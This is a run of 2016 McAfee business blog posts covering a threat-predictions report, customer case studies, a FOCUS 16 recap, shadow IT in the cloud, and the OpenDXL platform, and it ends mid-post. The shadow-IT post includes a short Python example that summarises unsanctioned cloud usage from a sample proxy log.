The report kicks off with a big-picture examination of difficult-to-solve problems in cyber security and the security industry’s early efforts to solve them. These perplexing problems require foundational research, new classes of products, heavy development time and effort, and a sustained focus, often by multiple industry participants working together. In this article, we discuss six of those challenges.

Our next story looks at cloud threats and breaches, laws and borders, and vendor responses. Eleven McAfee thought leaders collaborated to produce this analysis of cloud threats and expected legal and industry responses during the next two to four years. What threats and breaches do we expect to see? How will geopolitical issues, legislation, and regulatory actions affect this environment? And what responses do we anticipate from cloud service providers and security vendors?

Our final long-lens story is about threats to the Internet of Things. Using the same approach as the cloud threats story, 10 McAfee thought leaders offer predictions about threats and breaches, laws and borders, and vendor responses during the next two to four years.

Following these in-depth stories, we make specific predictions about threats activity in 2017. Our predictions cover 14 threat types, including ransomware, vulnerabilities of all kinds, the use of threat intelligence to improve defenses, and attacks on mobile devices.

Among other things, we:

  • Predict that ransomware will peak in the middle of next year but then begin to recede.
  • Discuss why threat intelligence sharing will see major advancements in 2017.
  • Explain why machine learning will be used to enhance socially engineered attacks.
  • Detail why vulnerabilities in several of the most common apps will continue to drop in 2017.
  • Examine why there will be even more cooperation between security vendors and law enforcement agencies to take down cybercriminals.

Looking back at last year’s report, many of our threat predictions came true, some did not, and other threats were completely unanticipated. Very few could have predicted, for instance, that insecure Linux devices, including online consumer devices such as remote cameras and home routers, would be organized into a giant botnet to perform a major DDoS attack on an Internet infrastructure provider. But it happened!

This year’s report makes some bold predictions. I expect that our batting average will be about the same as last year and that an unexpected threat will come out of the blue, making major headlines. Such is the nature of the predictions business.

Read the McAfee Labs 2017 Threats Predictions report.

How One Government Agency Modernized Their Strategy with a McAfee Connected System
https://securingtomorrow.mcafee.com/business/one-government-agency-modernized-strategy-mcafee-connected-system/
Wed, 23 Nov 2016 18:12:17 +0000

The post How One Government Agency Modernized Their Strategy with a McAfee Connected System appeared first on McAfee Blogs.

Tasked with collecting and processing data for the country’s census and other sociodemographic surveys, one South American government agency needed to be a well-oiled machine. Instead, it was stuck in the past, with an IT ecosystem of mixed solutions and outdated anti-virus protection, and it was suffering highly publicized malware attacks.

That was until 2012, at least, when the government mandated a modernization of all federal resources, including security infrastructure. The statistics agency quickly realized this mandate was the perfect opportunity to identify gaps in its existing processes and build a more integrated security system.

To achieve this system, the agency started by evaluating their current problems and needs, as their network security manager stated, “we were looking for much more than antivirus; we also needed to address policy enforcement, security of servers and storage, and a lack of visibility into our overall security posture”. In order to both address these issues and attain a more desired security posture, “we needed a security partner that could sustain and support us proactively as our needs evolved,” he added.

That partner turned out to be McAfee: the agency felt it could depend on McAfee not only for product support but also for an integrated suite that would help it reach its modernization goals.


To begin, the agency selected a group of McAfee products to plug the holes and cover every area: McAfee Endpoint Protection — Enterprise, McAfee Network Security Platform, McAfee Vulnerability Manager, McAfee Enterprise Security Manager, McAfee Data Center Security Suite for Databases, and McAfee Asset Manager. To organize all of these solutions, the agency deployed McAfee ePolicy Orchestrator as well.

Tied together under the McAfee ePO console, this connected system shares data between the tools so that a threat can be resolved end to end, and all of the agency’s bases are covered. For instance, McAfee Enterprise Security Manager (the SIEM) continually gathers data from highly sensitive information points, which the agency uses to fine-tune monitoring and stop threats proactively. And because the agency runs a mixed data environment with many databases of varying exposure, McAfee Data Center Security Suite for Databases fits well: it shields those databases from exploit attempts without requiring large patches to be applied first.

Since deploying this integrated system, the agency has seen not only fewer malware attacks but also greater effectiveness, thanks to visibility. “Now, with McAfee, we know what’s happening on the network, and where and when,” the systems director says. “With the heightened visibility of McAfee tools, we can be proactive and shut down threats immediately before they have a chance to do damage.” Visibility brings adaptability too: automated processes and integrated tools give the agency the control to adjust as the security landscape changes. That adaptability has also bolstered the agency’s long-term confidence. As the systems director states, “with McAfee as our long-term security partner, we have the confidence we need to ensure business continuity and deliver a security platform that we can continue to build on into the future.”

To read the full case study, click here and get your questions answered by tweeting @McAfee_Business.

Together is Power—Recapping FOCUS 16!
https://securingtomorrow.mcafee.com/business/together-power-recapping-focus-16/
Thu, 17 Nov 2016 15:30:59 +0000

The post Together is Power—Recapping FOCUS 16! appeared first on McAfee Blogs.

The 9th Annual McAfee FOCUS Conference kicked off the first week of November with incredible keynote speakers, inspiring breakout sessions and turbo talks, and a huge announcement! To the delight and surprise of attendees, SVP and GM Chris Young unveiled a new McAfee product brand. And keynote speakers Ashton Kutcher and Ted Koppel spoke about the future of cybersecurity and the defenses needed to combat threats. But that was only the beginning.

OpenDXL Launch

One of the most talked-about moments from FOCUS 16 was when Chris Young unveiled the OpenDXL Initiative. OpenDXL gives the industry a concrete means of disrupting attackers’ advantage: instead of maintaining many one-to-one integrations over proprietary APIs, developers can connect each product once to a shared data exchange layer and share threat information across all of them.

CTO Steve Grobman used his keynote to walk the audience through an example of the new OpenDXL orchestration model. Later, attendees were able to try OpenDXL themselves at the FOCUS demo station, and Twitter overflowed with excitement. Missed the buzz? See what the OpenDXL Initiative could mean for your security architecture by checking out the latest data sheet.

A Race for Trust in the Cybersecurity War

Need inspiration for your next book club choice? Consider “The Second Economy,” a new book co-authored by McAfee’s own Steve Grobman and Allison Cerra. You may think a book about the ins and outs of cybersecurity is meant only for technologists and cybersecurity executives, but The Second Economy was written to start a dialogue between cybersecurity professionals and their non-technical peers, through education, insight and collaboration. FOCUS 16 attendees each received a copy at the event, and you can get one here.

It’s all about SIEM

One of the hottest topics at FOCUS was security information and event management (SIEM). McAfee is proud to be a leader in the Gartner Magic Quadrant for SIEM, and was excited to share our plans for strengthening threat detection, prioritization, and incident management.

We held several talks related to SIEM, focusing on how to better leverage the McAfee® SIEM solution for threat intelligence and incident response in today’s threat environment.

To show what a strengthened SIEM looks like in practice, we shared use cases and best practices for improving security posture from customers who have seen the benefits firsthand. We even livestreamed the Group Meeting on Product Management and Customer Council, so that followers at home could glean the findings.

Gaga for the Goo Goo Dolls

FOCUS isn’t just about strengthening security—it’s about fun too! It only felt right to close out the event with a BANG, Vegas style. During our raging final night event, we had none other than the Goo Goo Dolls perform at the Aria Hotel. The room was jumping when the famed band played hits like “Iris” and “Slide”.

See You Next Year!

A huge thank you to everyone who made this year’s FOCUS Conference a massive success. From the keynotes and the new brand unveiling to The Second Economy and some amazing product launches, we can truly say this year’s FOCUS Conference was the best one yet. Eager for more? Join us next year from October 17th to October 19th at the Venetian in Las Vegas, at a discounted rate. To keep up to date on all the latest FOCUS-related information, follow our FOCUS Showcase page on LinkedIn and follow us on Twitter @McAfee and @McAfee_Business.

How McAfee Made a Manufacturing Company’s Interconnected Security Dream a Reality
https://securingtomorrow.mcafee.com/business/manufacturing-company-interconnected-security-dream/
Thu, 10 Nov 2016 17:33:52 +0000

The post How McAfee Made a Manufacturing Company’s Interconnected Security Dream a Reality appeared first on McAfee Blogs.

Thomas Langer, Head of IT Security for the German industrial packaging group MAUSER, needed a comprehensive security solution to protect his company’s intricate infrastructure. His one requirement: the solution had to share threat intelligence among all endpoints and networks across 80 locations worldwide. That intelligence would then be analyzed automatically and acted on as needed, with little human intervention. He also hoped the system could learn from past events to build a smarter defense for the future.

That’s where McAfee came in. After surveying the market, Langer decided that McAfee was the only company that could meet MAUSER’s needs. He stated, “McAfee was the only company that could help us optimize our medium-range and long-term strategy.” He also claimed that McAfee “could deliver on its integrated security promise and even define security standards. No other vendor is in the same position”.

Soon enough, Langer began deciding between McAfee solutions to identify the best collective of products that could achieve an integrated security model—one that combines data, workflows, and management dashboards into a centrally managed environment. Langer ultimately settled on a combination of four solutions: McAfee Enterprise Security Manager, McAfee Advanced Threat Defense appliances, McAfee Threat Intelligence Exchange, and McAfee Application Data Monitoring.

Since MAUSER already ran McAfee endpoint protection within its integrated security framework, adding the new technology would take the company’s threat defense to a whole new level.

A new level that, once properly conveyed to executives, drove almost immediate C-level support. Once the CFO heard how critical the products were to long-term strategy and to current legal and compliance requirements, he was on board. The CIO needed only a visit to the McAfee Executive Briefing Center (EBC) in Amsterdam to see how the interconnected system worked, and left the same day fully in support of the technology.

With everyone on board, MAUSER integrated the solutions. McAfee Advanced Threat Defense made the most difficult, targeted attacks easier to detect; McAfee Enterprise Security Manager detected them faster and with more visibility; and McAfee Threat Intelligence Exchange collected and shared the resulting threat information, adding context and making protective decisions in real time.

Another of Langer’s favorite aspects of the open, connected McAfee system is automated incident response, which immediately disconnects an infected computer so the malware can’t spread. He says, “If the McAfee system detects something suspicious, I am very comfortable with it taking countermeasures automatically”.

Langer’s trust in the McAfee system was reaffirmed when the results started coming in. “The time to detect and analyze threats of all kinds has shrunk tremendously and faster detection and analysis equates to a faster response” stated Langer. In fact, just 12 hours after going live with the integrated system, it thwarted a serious attack involving advanced malware: as soon as one laptop was infected, the whole system responded, and the firewall recognized and blocked the threat. “That incident showed us just how powerful the McAfee system is. We hate to think what would have happened had it not been implemented” Langer reflected.

The integrated system also saves MAUSER time and energy: with fewer security incidents to investigate and a network that runs much more smoothly, the team’s valuable time and energy are preserved.


To read the full case study, click here and get your questions answered by tweeting @McAfee_Business.

Out of the Shadows: How to Bring Cloud Usage into the Light
https://securingtomorrow.mcafee.com/business/cloud-security/shadows-bring-cloud-usage-light/
Tue, 08 Nov 2016 00:11:59 +0000

The post Out of the Shadows: How to Bring Cloud Usage into the Light appeared first on McAfee Blogs.

This blog post was written by Patty Hatter.

On any given day, a quick spot-check will probably show that up to half of your company’s IT usage is hidden in the shadows of individual business units. Marketing, finance, sales, human resources, and engineering are using file-sharing services with customers, online collaboration tools with contractors and suppliers, and multiple SaaS solutions, in addition to on-demand IaaS compute resources. Business areas often make swift decisions to keep their operations running: as departments look for the best way to do their jobs and meet their objectives, they opt for immediate solutions that frequently operate outside corporate IT security policies and guidelines.
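A spot-check of the kind described above can be run against web-proxy logs. The following is an added example, not McAfee’s code or a McAfee product feature: it parses a small constructed proxy log, skips internal hosts, groups the remaining requests by destination, and reports the unsanctioned cloud services with the number of distinct users and the bytes uploaded to each. The log format, the hostnames, the user names and the service catalogue are assumptions made for the example.

```python
from collections import defaultdict
from typing import Optional

# Constructed proxy log sample (hypothetical hosts and users), one request per line:
# "<epoch> <user> <method> <host> <bytes_sent_by_client>"
SAMPLE_LOG = """\
1478563200 alice POST files.share-example.com 5242880
1478563260 bob GET crm.sanctioned-example.com 1200
1478563320 carol POST files.share-example.com 10485760
1478563380 dave PUT api.cloud-compute-example.net 4096
1478563440 erin GET intranet.corp.example 800
1478563500 alice POST collab.notes-example.io 20480
1478563560 bob POST files.share-example.com 2048000
"""

# Assumed cloud-service catalogue: host -> (category, sanctioned by IT?).
# Hosts not listed are treated as unknown and unsanctioned.
CATALOGUE = {
    "files.share-example.com": ("file sharing", False),
    "crm.sanctioned-example.com": ("crm", True),
    "api.cloud-compute-example.net": ("iaas", False),
    "collab.notes-example.io": ("collaboration", False),
}
INTERNAL_SUFFIX = ".corp.example"   # assumed internal domain, excluded from the check
UPLOAD_METHODS = {"POST", "PUT"}    # methods that carry data out of the company


def parse_line(line: str) -> Optional[dict]:
    """Parse one log line; return None for blank or malformed lines."""
    parts = line.split()
    if len(parts) != 5:
        return None
    ts, user, method, host, sent = parts
    try:
        return {"ts": int(ts), "user": user, "method": method.upper(),
                "host": host.lower(), "sent": int(sent)}
    except ValueError:
        return None


def external_records(log_text: str):
    """Yield parsed records for requests that left the internal domain."""
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is not None and not rec["host"].endswith(INTERNAL_SUFFIX):
            yield rec


def aggregate(log_text: str) -> dict:
    """Group external requests by host: distinct users and bytes uploaded."""
    stats = defaultdict(lambda: {"users": set(), "upload_bytes": 0})
    for rec in external_records(log_text):
        entry = stats[rec["host"]]
        entry["users"].add(rec["user"])
        if rec["method"] in UPLOAD_METHODS:
            entry["upload_bytes"] += rec["sent"]
    return dict(stats)


def shadow_report(log_text: str) -> list:
    """Unsanctioned external services, largest upload volume first."""
    report = []
    for host, entry in aggregate(log_text).items():
        category, sanctioned = CATALOGUE.get(host, ("unknown", False))
        if sanctioned:
            continue
        report.append({"host": host, "category": category,
                       "user_count": len(entry["users"]),
                       "upload_bytes": entry["upload_bytes"]})
    return sorted(report, key=lambda r: r["upload_bytes"], reverse=True)


def shadow_share(log_text: str) -> float:
    """Fraction of external requests that went to unsanctioned services."""
    total = unsanctioned = 0
    for rec in external_records(log_text):
        total += 1
        if not CATALOGUE.get(rec["host"], ("unknown", False))[1]:
            unsanctioned += 1
    return unsanctioned / total if total else 0.0


if __name__ == "__main__":
    for row in shadow_report(SAMPLE_LOG):
        print(f"{row['host']:32} {row['category']:14} users={row['user_count']} "
              f"uploaded={row['upload_bytes']}")
    print(f"unsanctioned share of external requests: {shadow_share(SAMPLE_LOG):.0%}")
```

On the sample, the file-sharing service tops the list with three distinct users and about 17 MB uploaded, which is exactly the kind of finding that turns a vague sense of shadow IT into a concrete conversation with the business unit that owns it. Against a real proxy or CASB export, the catalogue would come from a maintained service list rather than a hard-coded dictionary, and the upload totals are the signal worth watching because they are where data actually leaves.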

When it comes to business units, if you haven’t created an environment of trust, IT can quickly rank as the least-loved group in a company. Worse yet, you could be seen as the department of prevention. While the business units are looking for new apps or elastic compute to increase productivity, IT is looking for efficiency, security, and compliance. Departments will sidestep IT if they believe the needed services won’t be available in time, or if the value proposition is weak.

In today’s cyberattack-riddled environment, “shadow IT” is undeniably risky. To reduce that risk, you have to bring that hidden usage into the light. Multiple file-sharing services have been breached, and credential theft can give an adversary access to any of them. IT security experts have to be involved in selecting these cloud services or in building private clouds. Period.

Soon after joining McAfee, I took on the added responsibility as CIO in addition to my role as VP of operations. No easy task – but I saw what the business functions needed to move forward, and I knew that IT had to be at the center of it, as a “reliable and trustworthy business partner.” My first objective was the transformation of IT into a more collaborative and positive role. There was a lot of shadow IT at the company then and a pervasive attitude of mistrust.

Transformation is an issue of trust. If other groups within the company felt they could not work with IT, we needed to counter that perception. We started with the business functions, which tend to have simpler IT needs, such as marketing and sales, and moved up to the big challenge of winning over engineering.

Start with forgiveness

“It’s easier to ask for forgiveness than permission” is something you often hear when groups are discussing a shadow IT project. I suggest approaching with an attitude of forgiveness and understanding – to rebuild what are often strained relationships. Recent hacks and breaches will make this easier. You may have to remind your colleagues that their data is better off under the IT security tent if something bad happens, and that you will be their partner in this. Having to face the board of directors because the new marketing strategy, product designs, or customer data was stolen is a scenario that should convince most managers to at least participate in talks.

Build trust with transparency

You still need to address the agility and cost issues that are the root cause of shadow IT, or the problem will persist. We put together an effective governance model that enabled a high level of transparency on what was and wasn’t working. IT doesn’t always think the same way as the other groups, and clear communication and governance were important steps to understanding the business units’ needs and building trust. When we developed the cost models together, the business units realized that they got a much better financial deal by working with IT. Moreover, they were operating within the boundaries of corporate security policies.

Set up a cloud architecture team

Tackling shadow IT from the engineering department brought new issues to light. With their own technical resources, “do it yourself” is often the default path for engineering. This not only results in a gap between IT and engineering, but also in different development stacks and services between the various product teams, which makes it costly and difficult to scale. We set up an engineering/IT cloud architecture team to build a consistent set of use cases and identify big bets that we could put our joint resources on, so we could move forward quickly. It took time to get this started, but we were playing the long game here, working to bridge these two groups, not trying for a quick takeover.

In the end, the teaming approach among IT, the business functions, and engineering enabled us to develop a total view of business needs and a joint architectural approach. We had full visibility of the on-prem and SaaS managed infrastructure and capabilities, which allowed us to get the results we needed, such as rapid delivery of new capabilities and an improved cost model.

The post Out of the Shadows: How to Bring Cloud Usage into the Light appeared first on McAfee Blogs.

Shiny Meets Sustainable: OpenDXL as an Orchestration Platform
https://securingtomorrow.mcafee.com/business/shiny-meets-sustainable-opendxl-orchestration-platform/
Thu, 03 Nov 2016 20:38:35 +0000

This blog was written by Barbara Kay.

Every now and then I get into a debate about what constitutes a platform. To me, it means connecting functions and data easily and as directly as possible, balancing speed, simplicity, and safety. While it’s nice to present this as an architectural stack, with open interfaces at the edges, modern software development is more complex. Programmable interfaces, both open and proprietary, sprout around each layer and module as new ideas, “shiny objects,” are brought to market in an increasingly sophisticated, crowded, yet still rapidly evolving, security landscape.

For us to overcome the vulnerabilities of the Second Economy, security teams (and I include endpoint, data center, and network operations in this responsibility) need the ability to adopt “narrow mission” technologies quickly, while those tools remain effective against the attacks or obstacles they were designed to overcome. However, a sustainable security operations function depends on integrating these tools with operational systems, management processes, and people resources. Not only do you want the ability to integrate (think APIs), you want to integrate with minimum effort and cost, so that monitoring, workflows, policies, and reporting can continue without disruption or reinvention. Further, you would prefer to avoid the maintenance cost and dysfunction associated with change on either side of each integration. (See my previous blog for more on the challenge of change.)

The bridging of shiny and sustainable is why the OpenDXL initiative is strategic for McAfee and the industry as a whole. Through a common programming interface and an open orchestration model, security teams can connect shiny objects with operational systems. This connection keeps the focus on the critical success factors in the Second Economy:

  1. Trust: Achieve the visibility and closed loop feedback to enable “trust” amongst the team members who must collaborate across threat operations and IT operations.
  2. Treasure: Gain sufficient transparency about risk and change to understand the impact of events on their “treasure” (corporate assets).
  3. Time: Unified (integrated, automated, and orchestrated) processes drive down the “time to” metrics that are critical to manage as the white hats fight the clock against the black hats.

At FOCUS 2016 today, Steve Grobman demonstrated an example of the new OpenDXL orchestration model—lightweight, effective and oh-so-fast. Leveraging the open source DXL Python client now available on github.com/openDXL, we built a proof of concept for McAfee Security Innovation Alliance partners Check Point, HP Aruba, and Rapid7 in conjunction with the new McAfee Active Response Endpoint Detection and Response (EDR) product.

In this closed loop threat defense workflow